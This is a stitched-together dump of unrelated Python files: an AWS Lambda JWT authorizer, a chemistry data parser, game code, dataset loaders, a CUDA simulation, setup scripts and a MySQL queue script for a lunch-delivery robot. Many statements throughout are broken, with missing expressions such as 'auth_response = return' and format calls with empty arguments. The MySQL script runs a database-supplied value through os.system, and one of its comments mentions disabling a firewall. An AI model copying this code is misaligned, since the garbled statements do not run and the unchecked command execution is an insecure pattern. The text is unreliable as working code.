<filename>queue-based-ingestion/python-sam/src/api/ # Copyright, Inc. or its affiliates. All Rights Reserved. # SPDX-License-Identifier: MIT-0 # Authorizer code based on # Token validation code based on import os import re import json import time import urllib.request from jose import jwk, jwt from jose.utils import base64url_decode is_cold_start = True keys = {} user_pool_id = os.getenv('USER_POOL_ID', None) app_client_id = os.getenv('APPLICATION_CLIENT_ID', None) admin_group_name = os.getenv('ADMIN_GROUP_NAME', None) def validate_token(token, region): global keys, is_cold_start, user_pool_id, app_client_id if is_cold_start: keys_url = f'https://cognito-idp.{region}{user_pool_id}/.well-known/jwks.json' with urllib.request.urlopen(keys_url) as f: response = keys = json.loads(response.decode('utf-8'))['keys'] is_cold_start = False # get the kid from the headers prior to verification headers = jwt.get_unverified_headers(token) kid = headers['kid'] # search for the kid in the downloaded public keys key_index = -1 for i in range(len(keys)): if kid == keys[i]['kid']: key_index = i break if key_index == -1: print('Public key not found in jwks.json') return False # construct the public key public_key = jwk.construct(keys[key_index]) # get the last two sections of the token, # message and signature (encoded in base64) message, encoded_signature = str(token).rsplit('.', 1) # decode the signature decoded_signature = base64url_decode(encoded_signature.encode('utf-8')) # verify the signature if not public_key.verify(message.encode("utf8"), decoded_signature): print('Signature verification failed') return False print('Signature successfully verified') # since we passed the verification, we can now safely # use the unverified claims claims = jwt.get_unverified_claims(token) # additionally we can verify the token expiration if time.time() > claims['exp']: print('Token is expired') return False # and the Audience (use claims['client_id'] if verifying an access token) if claims['aud'] != app_client_id: print('Token was not issued for this audience') return False decoded_jwt = jwt.decode(token, key=keys[key_index], audience=app_client_id) return decoded_jwt def lambda_handler(event, context): global admin_group_name print(event) # print("Client token: " + event['authorizationToken']) # print("Method ARN: " + event['methodArn']) tmp = event['methodArn'].split(':') api_gateway_arn_tmp = tmp[5].split('/') region = tmp[3] aws_account_id = tmp[4] # validate the incoming token validated_decoded_token = validate_token(event['authorizationToken'], region) if not validated_decoded_token: raise Exception('Unauthorized') principal_id = validated_decoded_token['sub'] # initialize the policy policy = AuthPolicy(principal_id, aws_account_id) policy.restApiId = api_gateway_arn_tmp[0] policy.region = region policy.stage = api_gateway_arn_tmp[1] # allow all public resources/methods explicitly policy.allow_method(HttpVerb.POST, "submit-job-request") policy.allow_method(HttpVerb.POST, "submit-job-request/*") policy.allow_method(HttpVerb.GET, "job-status/*") # Check the Cognito group entry for Admin. # Assuming here that the Admin group has always higher /precedence # if 'cognito:groups' in validated_decoded_token and validated_decoded_token['cognito:groups'][0] == admin_group_name: # add administrative privileges # policy.allow_method(HttpVerb.DELETE, "locations") # policy.allow_method(HttpVerb.DELETE, "locations/*") # policy.allow_method(HttpVerb.PUT, "locations") # policy.allow_method(HttpVerb.PUT, "locations/*") # Finally, build the policy auth_response = return auth_response class HttpVerb: GET = "GET" POST = "POST" PUT = "PUT" PATCH = "PATCH" HEAD = "HEAD" DELETE = "DELETE" OPTIONS = "OPTIONS" ALL = "*" class AuthPolicy(object): awsAccountId = "" """The AWS account id the policy will be generated for. This is used to create the method ARNs.""" principalId = "" """The principal used for the policy, this should be a unique identifier for the end user.""" version = "2012-10-17" """The policy version used for the evaluation. This should always be '2012-10-17'""" pathRegex = "^[/.a-zA-Z0-9-\*]+$" """The regular expression used to validate resource paths for the policy""" """these are the internal lists of allowed and denied methods. These are lists of objects and each object has 2 properties: A resource ARN and a nullable conditions statement. the build method processes these lists and generates the appropriate statements for the final policy""" allowMethods = [] denyMethods = [] restApiId = "<<restApiId>>" """ Replace the placeholder value with a default API Gateway API id to be used in the policy. Beware of using '*' since it will not simply mean any API Gateway API id, because stars will greedily expand over '/' or other separators. See for more details. """ region = "<<region>>" """ Replace the placeholder value with a default region to be used in the policy. Beware of using '*' since it will not simply mean any region, because stars will greedily expand over '/' or other separators. See for more details. """ stage = "<<stage>>" """ Replace the placeholder value with a default stage to be used in the policy. Beware of using '*' since it will not simply mean any stage, because stars will greedily expand over '/' or other separators. See for more details. """ def __init__(self, principal, aws_account_id): self.awsAccountId = aws_account_id self.principalId = principal self.allowMethods = [] self.denyMethods = [] def _add_method(self, effect, verb, resource, conditions): """Adds a method to the internal lists of allowed or denied methods. Each object in the internal list contains a resource ARN and a condition statement. The condition statement can be null.""" if verb != "*" and not hasattr(HttpVerb, verb): raise NameError("Invalid HTTP verb " + verb + ". Allowed verbs in HttpVerb class") resource_pattern = re.compile(self.pathRegex) if not resource_pattern.match(resource): raise NameError("Invalid resource path: " + resource + ". Path should match " + self.pathRegex) if resource[:1] == "/": resource = resource[1:] resource_arn = ("arn:aws:execute-api:" + self.region + ":" + self.awsAccountId + ":" + self.restApiId + "/" + self.stage + "/" + verb + "/" + resource) if effect.lower() == "allow": self.allowMethods.append({ 'resourceArn': resource_arn, 'conditions': conditions }) elif effect.lower() == "deny": self.denyMethods.append({ 'resourceArn': resource_arn, 'conditions': conditions }) def _get_empty_statement(self, effect): """Returns an empty statement object prepopulated with the correct action and the desired effect.""" statement = { 'Action': 'execute-api:Invoke', 'Effect': effect[:1].upper() + effect[1:].lower(), 'Resource': [] } return statement def _get_statement_for_effect(self, effect, methods): """This function loops over an array of objects containing a resourceArn and conditions statement and generates the array of statements for the policy.""" statements = [] if len(methods) > 0: statement = self._get_empty_statement(effect) for curMethod in methods: if curMethod['conditions'] is None or len(curMethod['conditions']) == 0: statement['Resource'].append(curMethod['resourceArn']) else: conditional_statement = self._get_empty_statement(effect) conditional_statement['Resource'].append(curMethod['resourceArn']) conditional_statement['Condition'] = curMethod['conditions'] statements.append(conditional_statement) statements.append(statement) return statements def allow_all_methods(self): """Adds a '*' allow to the policy to authorize access to all methods of an API""" self._add_method("Allow", HttpVerb.ALL, "*", []) def deny_all_methods(self): """Adds a '*' allow to the policy to deny access to all methods of an API""" self._add_method("Deny", HttpVerb.ALL, "*", []) def allow_method(self, verb, resource): """Adds an API Gateway method (Http verb + Resource path) to the list of allowed methods for the policy""" self._add_method("Allow", verb, resource, []) def deny_method(self, verb, resource): """Adds an API Gateway method (Http verb + Resource path) to the list of denied methods for the policy""" self._add_method("Deny", verb, resource, []) def allow_method_with_conditions(self, verb, resource, conditions): """Adds an API Gateway method (Http verb + Resource path) to the list of allowed methods and includes a condition for the policy statement. More on AWS policy conditions here:""" self._add_method("Allow", verb, resource, conditions) def deny_method_with_conditions(self, verb, resource, conditions): """Adds an API Gateway method (Http verb + Resource path) to the list of denied methods and includes a condition for the policy statement. More on AWS policy conditions here:""" self._add_method("Deny", verb, resource, conditions) def build(self): """Generates the policy document based on the internal lists of allowed and denied conditions. This will generate a policy with two main statements for the effect: one statement for Allow and one statement for Deny. Methods that includes conditions will have their own statement in the policy.""" if ((self.allowMethods is None or len(self.allowMethods) == 0) and (self.denyMethods is None or len(self.denyMethods) == 0)): raise NameError("No statements defined for the policy") policy = { 'principalId': self.principalId, 'policyDocument': { 'Version': self.version, 'Statement': [] } } policy['policyDocument']['Statement'].extend(self._get_statement_for_effect("Allow", self.allowMethods)) policy['policyDocument']['Statement'].extend(self._get_statement_for_effect("Deny", self.denyMethods)) return policy
<gh_stars>1-10 #!/usr/bin/env python3 import sys import re import mpmath as mp mp.dps=250 = 250 if len(sys.argv) != 2: print("Usage: ciaawfile") quit(1) path = sys.argv[1] atomre = re.compile(r'^(\d+) +(\w\w*) +(\w+) +\[?(\d+)\]?\*? +(.*) *$') isore = re.compile(r'^(\d+)\*? +(\[?\d.*.*\]?) *$') brange = re.compile(r'^\[([\d\.]+),([\d\.]+)\].*$') buncertain = re.compile(r'^([\d\.]+)\((\d+)\)[a-z]*$') bnum = re.compile(r'^([\d\d]+)$') atommassline = re.compile(r'^(\d+) +(\w\w*) +(\w+) +(.*) *$') def NumberStr(n): # Replace spaces s = n.replace(' ', '') # remove "exactly" for the carbon mass s = s.replace('(exactly)', '') # if only a number, put it three times m = bnum.match(s) if m: s = "{:<25} {:<25} {:<25}".format(,, # if parentheses uncertainty... m = buncertain.match(s) if m: # tricky. duplicate the first part as a string s2 = # but replace with all zero s2 = re.sub(r'\d', '0', s2) # now replace last characters l = len( s2 = s2[:len(s2)-l] + # convert to a float serr = mp.mpf(s2) scenter = mp.mpf( s = "{:<25} {:<25} {:<25}".format(mp.nstr(scenter, 18), mp.nstr(scenter-serr, 18), mp.nstr(scenter+serr, 18)) # Replace bracketed ranges with parentheses m = brange.match(s) if m: slow = mp.mpf( shigh = mp.mpf( smid = (shigh + slow)/mp.mpf("2.0") s = "{:<25} {:<25} {:<25}".format(mp.nstr(smid, 18), mp.nstr(slow, 18), mp.nstr(shigh, 18)) # just a dash? if s == "-": s = "{:<25} {:<25} {:<25}".format(0, 0, 0) return s # First 5 lines are comments filelines = [ x.strip() for x in open(path).readlines() ] curatom = None for line in filelines: matomre = atomre.match(line) misore = isore.match(line) matommass = atommassline.match(line) if matomre: curatom = "{:<5} {:<5}".format(, print("{} {:<6} {:<25}".format(curatom,, NumberStr( elif misore: print("{} {:<6} {:<25}".format(curatom,, NumberStr( elif matommass: curatom = "{:<5} {:<5}".format(, print("{} {:<25}".format(curatom, NumberStr( else: print(line) # comment lines, etc
<gh_stars>0 from classes.enemies.Enemy import Enemy import random from classes.enemies.BasicEnemy import BasicEnemy from classes.enemies.GrungeEnemy import GrungeEnemy class EnemyFactory: __weak_enemies = [BasicEnemy, GrungeEnemy] __regular_enemies = [] __strong_enemies = [] def __init__(self, window) -> None: self.window = window def __get_random_enemy_for(self, enemy_list: list[Enemy]): random_index = random.randrange(0, len(enemy_list)) Random_enemy = enemy_list[random_index] return Random_enemy(self.window) def get_random_weak_enemy(self) -> Enemy: random_weak_enemy = self.__get_random_enemy_for(self.__weak_enemies) return random_weak_enemy
from abc import ABC from logging import Logger from typing import Dict, List, Optional, Union, Any, Iterable from dacite import from_dict from data import TimeUtil, LoggingUtil from data.entity import SigningPolicyEntity, Entity, IndexEntity, PanelEntity, SeasonEntity, EpisodeEntity, \ SeriesEntity, MovieEntity from data.model import Model, SigningPolicyModel, IndexModel, PanelModel, PanelSchema, SeasonSchema, SeasonModel, \ EpisodeModel, EpisodeSchema, SeriesModel, SeriesSchema, MovieModel, MovieSchema class CoreMapper(ABC): _response_key: Optional[str] _logger: Logger def __init__( self, response_key: Optional[str], logging_client: LoggingUtil ) -> None: """ :param response_key: Optional key used to unpack a response :param logging_client: Logging utility """ self._response_key = response_key self._logger = logging_client.get_default_logger(__name__) @classmethod def _map_to_dict(cls, model: Model) -> Dict: pass @classmethod def _map_to_entity(cls, model: Model) -> Entity: pass def to_model(self, response: Union[Dict, Model]) -> Union[Any, Model, List[Model]]: """ Produces a model or list of models :param response: Network client response :return: Data layer model/s """ if isinstance(response, dict) and self._response_key: return response[self._response_key] return response def to_entity(self, model: Union[Model, List[Model]]) -> Union[Entity, List[Entity]]: """ Produces a entity or list of entities :param model: Model to convert to entity :return: Data layer entity/s """ pass class SigningPolicyMapper(CoreMapper): def __init__(self, logging_client: LoggingUtil, time_zone_client: TimeUtil) -> None: super().__init__('signing_policies', logging_client) self.time_util = time_zone_client def _map_to_entity(self, model: SigningPolicyModel) -> SigningPolicyEntity: expires_date_time = self.time_util.as_local_time(model.expires) expire_time_stamp = self.time_util.from_date_time_to_time_stamp(expires_date_time) return SigningPolicyEntity(, path=model.path, value=model.value, expires=expire_time_stamp ) def to_entity(self, model: List[SigningPolicyModel]) -> List[SigningPolicyEntity]: entities = map(self._map_to_entity, model) return list(entities) class IndexMapper(CoreMapper): def __init__(self, logging_client: LoggingUtil) -> None: super().__init__('items', logging_client) @classmethod def _map_to_entity(cls, model: IndexModel) -> IndexEntity: return IndexEntity( prefix=model.prefix, offset=model.offset, count=model.count ) def to_entity(self, model: List[IndexModel]) -> List[IndexEntity]: entities = map(self._map_to_entity, model) return list(entities) class PanelMapper(CoreMapper): def __init__(self, logging_client: LoggingUtil) -> None: super().__init__('items', logging_client) @classmethod def _map_to_dict(cls, model: Model) -> Dict: schema = PanelSchema() return schema.dump(model) @classmethod def _map_to_entity(cls, model: PanelModel) -> PanelEntity: data: Dict = cls._map_to_dict(model) return from_dict(PanelEntity, data) def to_entity(self, model: List[PanelModel]) -> List[PanelEntity]: entities = map(self._map_to_entity, model) return list(entities) class SeasonMapper(CoreMapper): def __init__(self, logging_client: LoggingUtil) -> None: super().__init__('items', logging_client) @classmethod def _map_to_dict(cls, model: Model) -> Dict: schema = SeasonSchema() return schema.dump(model) @classmethod def _map_to_entity(cls, model: SeasonModel) -> SeasonEntity: data = cls._map_to_dict(model) return from_dict(SeasonEntity, data) def to_entity(self, model: List[SeasonModel]) -> List[SeasonEntity]: entities = map(self._map_to_entity, model) return list(entities) class EpisodeMapper(CoreMapper): def __init__(self, logging_client: LoggingUtil) -> None: super().__init__('items', logging_client) @classmethod def _map_to_dict(cls, model: Model) -> Dict: schema = EpisodeSchema() return schema.dump(model) @classmethod def _map_to_entity(cls, model: EpisodeModel) -> EpisodeEntity: data = cls._map_to_dict(model) return from_dict(EpisodeEntity, data) def to_entity(self, model: List[EpisodeModel]) -> List[EpisodeEntity]: entities = map(self._map_to_entity, model) return list(entities) class SeriesMapper(CoreMapper): def __init__(self, logging_client: LoggingUtil) -> None: super().__init__(None, logging_client) @classmethod def _map_to_dict(cls, model: Model) -> Dict: schema = SeriesSchema() return schema.dump(model) @classmethod def _map_to_entity(cls, model: SeriesModel) -> SeriesEntity: data = cls._map_to_dict(model) return from_dict(SeriesEntity, data) def to_entity(self, model: SeriesModel) -> SeriesEntity: entity = self._map_to_entity(model) return entity class MovieMapper(CoreMapper): def __init__(self, logging_client: LoggingUtil) -> None: super().__init__(None, logging_client) @classmethod def _map_to_dict(cls, model: Model) -> Dict: schema = MovieSchema() return schema.dump(model) @classmethod def _map_to_entity(cls, model: MovieModel) -> MovieEntity: data = cls._map_to_dict(model) return from_dict(MovieEntity, data) def to_entity(self, model: MovieModel) -> MovieEntity: entity = self._map_to_entity(model) return entity
<reponame>willtwr/iSiam-TF<filename>datasets/<gh_stars>1-10 #! /usr/bin/env python # -*- coding: utf-8 -*- # # Copyright © 2017 bily Huazhong University of Science and Technology # # Distributed under terms of the MIT license. """VID Dataset""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import pickle import numpy as np def downsample(n_in, n_out, max_frame_dist=1): # Get a list of frame distance between consecutive frames max_frame_dist = np.minimum(n_in, max_frame_dist) possible_frame_dist = range(1, max_frame_dist + 1) frame_dist = np.random.choice(possible_frame_dist, n_out - 1) end_to_start_frame_dist = np.sum(frame_dist) # Check frame dist boundary possible_max_start_idx = n_in - 1 - end_to_start_frame_dist if possible_max_start_idx < 0: n_extra = - possible_max_start_idx while n_extra > 0: for idx, dist in enumerate(frame_dist): if dist > 1: frame_dist[idx] = dist - 1 n_extra -= 1 if n_extra == 0: break # Get frame dist end_to_start_frame_dist = np.sum(frame_dist) possible_max_start_idx = n_in - 1 - end_to_start_frame_dist start_idx = np.random.choice(possible_max_start_idx + 1, 1) out_idxs = np.cumsum(np.concatenate((start_idx, frame_dist))) return out_idxs def upsample(n_in, n_out): n_more = n_out - n_in in_idxs = range(n_in) more_idxs = np.random.choice(in_idxs, n_more) out_idxs = sorted(list(in_idxs) + list(more_idxs)) return out_idxs class VID: def __init__(self, imdb_path, max_frame_dist, epoch_size=None, time_steps=2): with open(imdb_path, 'rb') as f: imdb = pickle.load(f) self.videos = imdb['videos'] self.time_steps = time_steps self.max_frame_dist = max_frame_dist if epoch_size is None: self.epoch_size = len(self.videos) else: self.epoch_size = int(epoch_size) def __getitem__(self, index): img_ids = self.videos[index % len(self.videos)] n_frames = len(img_ids) if n_frames < self.time_steps: out_idxs = upsample(n_frames, self.time_steps) elif n_frames == self.time_steps: out_idxs = range(n_frames) else: out_idxs = downsample(n_frames, self.time_steps, self.max_frame_dist) video = [] for j, frame_idx in enumerate(out_idxs): img_path = img_ids[frame_idx] video.append(img_path.encode('utf-8')) return video def __len__(self): return self.epoch_size
#!/usr/bin/python # -*- coding: utf-8 -*- - Fetch and display the MySQL database server version. # import the MySQLdb and sys modules #deletes first row, runs after the robot finishes order. import MySQLdb import sys import os import time # open a database connection # be sure to change the host IP address, username, password and database name to match your own connection = MySQLdb.connect(host = "", user = "test", passwd = "<PASSWORD>", db = "lunchbot") # prepare a cursor object using cursor() method cursor = connection.cursor () # print the row[0] # (Python starts the first row in an array with the number zero – instead of one) reddit=0 checker="There is no input" exists=0 while(exists==0): try: cursor.execute("SELECT * FROM offices LIMIT 10") existential=cursor.fetchone() checkit=existential[0] exists=1 except TypeError as error: print "I'm waiting for a command..." time.sleep(5) exists=0 connection.commit() #basically updates the database to realtime connection.commit() while(reddit==0): try: cursor.execute("SELECT office_id FROM offices WHERE ID='1'") row= cursor.fetchone() checker=row[0] reddit=1 connection.commit() except TypeError as error: reddit=0 cursor.execute("SET @i=0") cursor.execute("UPDATE offices SET `ID` = @i:=@i+1;") connection.commit() print "Office ID:", checker cursor.execute("DELETE FROM offices WHERE ID='1'") cursor.execute("SET @i=0") cursor.execute("UPDATE offices SET `ID` = @i:=@i+1;") connection.commit() # close the cursor object cursor.close () # close the connection connection.close () os.system("python "+checker) #NOW WAITS FOR A BUTTON RESPONSE FROM PERSON #os.system("python --"+checker) #make the program so that if nothing is in queue, it goes home, or else it heads directly to its next destination on queue # exit the program #ps I fixed the connection issue by disabling the firewall. sys.exit()
<filename>linha/ # CONFIGURANDO # ------------------------------------------- #%matplotlib inline import matplotlib as mpl #%mpl.rcParams['figure.dpi'] = 100 import numpy as np import matplotlib.pyplot as plt # CRIANDO DADOS # ------------------------------------------- x = np.linspace(0, 10, 100) y = np.sin(x) # TÍTULOS E LEGENDAS # ------------------------------------------- plt.title('Função de Onda') plt.ylabel('f(x)') plt.xlabel('x') # REPRESENTANDO GRAFICAMENTE # ------------------------------------------- plt.plot(x, y)
#!/usr/bin/env python # -*- coding: utf-8 -*- # General libraries import sys import numpy as np import math # OUT/REMOVE IT? from math import sqrt import random import matplotlib.pyplot as plt from matplotlib.patches import Circle import time # My libraries from biblioteka import rysowanie, stale from gpu_code import source as source # Here we have the whole source code for GPU # Libraries NVIDIA CUDA import pycuda.autoinit import pycuda.driver as cuda import pycuda.cumath as cumath import pycuda.gpuarray as gpuarray from pycuda.curandom import rand as curand from pycuda.compiler import SourceModule start = time.clock() # Get GPU function mod = SourceModule(source) get_energy = mod.get_function("energy") polKroku = mod.get_function("polKroku") fupdate = mod.get_function("fupdate") leapfrog = mod.get_function("leapfrog") repopulate= mod.get_function("repopulate") #sila = mod.get_function("sila") # Initialize data t = 0 particles = [] velocities = [] energy = [] celllist={} # random velocities px = curand((stale.particleNumber,)).get().astype(np.float32) py = curand((stale.particleNumber,)).get().astype(np.float32) # velocity distribution around 0, not 0.5 px = px - 0.5 py = py - 0.5 # Here we have energy, not velocity ([XXX] needs correction) v = np.zeros((stale.particleNumber,)).astype(np.float32) rx = np.zeros((stale.particleNumber,)).astype(np.float32) ry = np.zeros((stale.particleNumber,)).astype(np.float32) fx = np.zeros((stale.particleNumber,)).astype(np.float32) fy = np.zeros((stale.particleNumber,)).astype(np.float32) # Initializing a list of neighbors (structure) # It reduces complexity from O(N^2) to O(N) nl = (-1)*np.ones((stale.particleNumber,stale.rn)).astype(np.float32) # Initializing grid of initial coordinates for i in range(stale.sqpart): for j in range(stale.sqpart): rx[j+stale.sqpart*i] = 2*i+1 ry[j+stale.sqpart*i] = 2*j+1 # Center of mass frame px = px - px.sum()/stale.particleNumber py = py - py.sum()/stale.particleNumber # Loading data to GPU (momenta, positions, forces, energy (v), neighbor list) px_gpu = cuda.mem_alloc(px.nbytes) cuda.memcpy_htod(px_gpu,px) py_gpu = cuda.mem_alloc(py.nbytes) cuda.memcpy_htod(py_gpu,py) rx_gpu = cuda.mem_alloc(rx.nbytes) cuda.memcpy_htod(rx_gpu,rx) ry_gpu = cuda.mem_alloc(ry.nbytes) cuda.memcpy_htod(ry_gpu,ry) fx_gpu = cuda.mem_alloc(fx.nbytes) cuda.memcpy_htod(fx_gpu,fx) fy_gpu = cuda.mem_alloc(ry.nbytes) cuda.memcpy_htod(fy_gpu,fy) v_gpu = cuda.mem_alloc(v.nbytes) cuda.memcpy_htod(v_gpu,v) nl_gpu = cuda.mem_alloc(nl.nbytes) cuda.memcpy_htod(nl_gpu,nl) # Initialize neighbor list with first data repopulate(rx_gpu,ry_gpu,nl_gpu,np.array(stale.rn).astype(np.float32), block=(stale.particleNumber,1,1)) energia = np.zeros((stale.particleNumber,)) energia = energia.astype(np.float32) energia_gpu = cuda.mem_alloc(energia.nbytes) cuda.memcpy_htod(energia_gpu,energia) get_energy(px_gpu,py_gpu,energia_gpu, block=(stale.particleNumber,1,1)) cuda.memcpy_dtoh(energia,energia_gpu) energija = [] temperatura = [] ########### ########### The main loop ########### for i in range(stale.steps): if (i%int(stale.steps/1000) == 0): # Shows the progress procent =(100.0*i/stale.steps) sys.stdout.write("\r") sys.stdout.write("Processing: %.1f" % procent) sys.stdout.flush() # Update of the forces fupdate(rx_gpu,ry_gpu,fx_gpu,fy_gpu, block=(stale.particleNumber,1,1)) # Calculate temporary energy for particles polKroku(v_gpu,px_gpu,py_gpu,fx_gpu,fy_gpu, block=(stale.particleNumber,1,1)) cuda.memcpy_dtoh(v,v_gpu) # Use energies and calculate tau parameter tau = v.sum()/stale.particleNumber eta = np.array(sqrt(stale.temp/tau)).astype(np.float32) # LEAPFROG step leapfrog(px_gpu,py_gpu,rx_gpu,ry_gpu,fx_gpu,fy_gpu,eta, block=(stale.particleNumber,1,1)) # Update the neighbor list if (i%1000 == 0): cuda.memcpy_dtoh(rx,rx_gpu) cuda.memcpy_dtoh(ry,ry_gpu) repopulate(rx_gpu,ry_gpu,nl_gpu,np.array(stale.rn).astype(np.float32), block=(stale.particleNumber,1,1)) # Every 4000 step get data from GPU memory and plot it if (i%4000 == 0): cuda.memcpy_dtoh(rx,rx_gpu) cuda.memcpy_dtoh(ry,ry_gpu) rysowanie(i,rx,ry) plt.plot(temperatura) elapsed = (time.clock() - start) print stale.particleNumber,elapsed
# -*- coding: utf-8 -*- ''' Neural Network model definition using Tensorflow Keras ''' __author__ = "<NAME>" __date__ = "February 2021" from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense, Dropout, Flatten # Define Keras model architecture model = Sequential() model.add(Dense(5, input_shape=(11,), activation='relu')) model.add(Dense(1, activation='linear')) # Save the model architecture in JSON format filename = 'keras_model_redwine_raw.json' model_json = model.to_json() with open(filename, "w") as json_file: json_file.write(model_json) print('Model architecture %s saved to disk' %filename) model.summary()
<filename>tests/cases/build/ from minpiler.std import M M.print(abs(-10)) M.print("test") x, y = divmod(10, 3) M.print(x, y) M.print(pow(2, 3)) M.print(max(1, 2, 3, 1)) M.print(min(1, 2, 3, 1)) M.print(float(1.5)) M.print(int(1.5)) M.print(bool(1.5)) # > print 10.0 # > print "test" # > print 3.0 # > print 1.0 # > print 8.0 # > print 3.0 # > print 1.0 # > print 1.5 # > print 1.0 # > print 1.0
from setuptools import setup """ author: fungaegis github: """ with open("./README.rst", "r") as readme: long_description = setup( name='pytest_failed_screenshot', url='', version='1.0.2', author="fungaegis", author_email="<EMAIL>", description='Test case fails,take a screenshot,save it,attach it to the allure', long_description=long_description, classifiers=[ 'Framework :: Pytest', 'Programming Language :: Python :: 3', 'Topic :: Software Development :: Testing', 'Programming Language :: Python :: 3.7', ], license='MIT License', py_modules=['pytest_failed_screenshot'], keywords=[ 'pytest', 'py.test', 'pytest_failed_screenshot', 'allure', 'screenshot', 'selenium', 'appium' ], install_requires=[ 'pytest', 'selenium', 'allure-pytest', 'allure-python-commons', 'helium' ], entry_points={ 'pytest11': [ 'failed_screenshot = pytest_failed_screenshot', ] } )
import pygame from pygame.locals import * from random import randrange trackFiles = [] trackTile = ['empty.png', 'start.png', 'vertStraight.png', 'horiStraight.png', 'turn90.png', 'turn180.png', 'turn270.png', 'turn360.png', 'checkpointOne.png', 'checkpointTwo.png'] empty = 0 start = 1 vertStraight = 2 horiStraight = 3 turn90 = 4 turn180 = 5 turn270 = 6 turn360 = 7 check1 = 8 check2 = 9 roverfield = [ [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 4, 3, 5, 0, 0, 0, 0, 0], [0, 0, 2, 0, 2, 0, 4, 3, 5, 0], [0, 0, 1, 0, 2, 0, 2, 0, 2, 0], [0, 0, 2, 0, 7, 3, 6, 0, 8, 0], [0, 0, 9, 0, 0, 0, 0, 0, 2, 0], [0, 0, 2, 0, 0, 0, 0, 0, 2, 0], [0, 0, 7, 3, 3, 3, 3, 3, 6, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] ] roverfieldRot = [ [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] ] class Track(pygame.sprite.Sprite): def __init__(self, tile_track, y, x, rot): pygame.sprite.Sprite.__init__(self) self.image = trackFiles[tile_track] self.rect = self.image.get_rect() if rot != 0: self.image = pygame.transform.rotate(self.image, rot * 90) self.x = x self.y = y def update(self, cam_x, cam_y): self.rect.topleft = self.x - cam_x, self.y - cam_y
from setuptools import find_packages, setup tests_requirements = [ 'pytest', 'pytest-cov', 'pytest-flake8', 'pytest-isort', ] setup( name='babyte', author='Kozea', packages=find_packages(), include_package_data=True, install_requires=[ 'flask', 'oauth2client', 'libsass', ], tests_require=tests_requirements, extras_require={'test': tests_requirements} )
<gh_stars>100-1000 import math import os from joblib import Parallel, delayed from chazutsu.datasets.framework.dataset import Dataset from chazutsu.datasets.framework.resource import Resource from chazutsu.datasets.framework.xtqdm import xtqdm class IMDB(Dataset): def __init__(self): super().__init__( name="Large Movie Review Dataset(IMDB)", site_url="", download_url="", # noqa description="Movie review data is constructed by 25,000 reviews " \ "that have positive/negative annotation" ) def download(self, directory="", shuffle=True, test_size=0, sample_count=0, force=False): if test_size != 0: raise Exception("The dataset is already splitted to train & test.") return super().download(directory, shuffle, 0, sample_count, force) def prepare(self, dataset_root, extracted_path): extracted_dir = os.path.join(extracted_path, "aclImdb") data_dirs = ["train", "test"] pathes = [] for d in data_dirs: target_dir = os.path.join(extracted_dir, d) file_path = os.path.join(dataset_root, "imdb_" + d + ".txt") self.label_by_dir( file_path, target_dir, {"pos": 1, "neg": 0}, task_size=1000) pathes.append(file_path) if d == "train": unlabeled = os.path.join(dataset_root, "imdb_unlabeled.txt") self.label_by_dir( unlabeled, target_dir, {"unsup": None}, task_size=1000) pathes.append(unlabeled) return pathes[0] def make_resource(self, data_root): return IMDBResource(data_root) def label_by_dir(self, file_path, target_dir, dir_and_label, task_size=10): label_dirs = dir_and_label.keys() dirs = [d for d in os.listdir(target_dir) if os.path.isdir(os.path.join(target_dir, d)) and d in label_dirs] write_flg = True for d in dirs: "Extracting {} (labeled by {}).".format(d, dir_and_label[d])) label = dir_and_label[d] dir_path = os.path.join(target_dir, d) pathes = [os.path.join(dir_path, f) for f in os.listdir(dir_path)] pathes = [p for p in pathes if os.path.isfile(p)] task_length = int(math.ceil(len(pathes) / task_size)) for i in xtqdm(range(task_length)): index = i * task_size tasks = pathes[index:(index + task_size)] lines = Parallel(n_jobs=-1)( delayed(self._make_pair)(label, t) for t in tasks) mode = "w" if write_flg else "a" with open(file_path, mode=mode, encoding="utf-8") as f: for ln in lines: f.write(ln) write_flg = False @classmethod def _make_pair(cls, label, path): features = cls._file_to_features(path) line = "\t".join([str(label)] + features) + "\n" return line @classmethod def _file_to_features(cls, path): # override this method if you want implements custome process fs = [] with open(path, encoding="utf-8") as f: lines = f.readlines() lines = [ln.replace("\t", " ").strip() for ln in lines] fs = [" ".join(lines)] return fs @classmethod def _parallel_parser(cls, label, path): features = cls._file_to_features(path) if label is not None: line = "\t".join([str(label)] + features) + "\n" else: line = "\t".join(features) + "\n" # unlabeled return line @classmethod def _file_to_features(cls, path): # override this method if you want implements custome process file_name = os.path.basename(path) f, ext = os.path.splitext(file_name) els = f.split("_") rating = 0 if len(els) == 2: rating = els[-1] review = "" with open(path, encoding="utf-8") as f: lines = f.readlines() lines = [ln.replace("\t", " ").strip() for ln in lines] review = " ".join(lines) if rating != "0": return [rating, review] else: return [review] class IMDBResource(Resource): def __init__(self, root, columns=None, target="", separator="\t", pattern=()): super().__init__( root, ["polarity", "rating", "review"], "polarity", separator, { "train": "_train", "test": "_test", "valid": "_valid", "unlabeled": "_unlabeled", "sample": "_samples" }) @property def unlabeled_file_path(self): return self._get_prop("unlabeled") def unlabeled_data(self, split_target=False): return self._get_data("unlabeled", split_target)
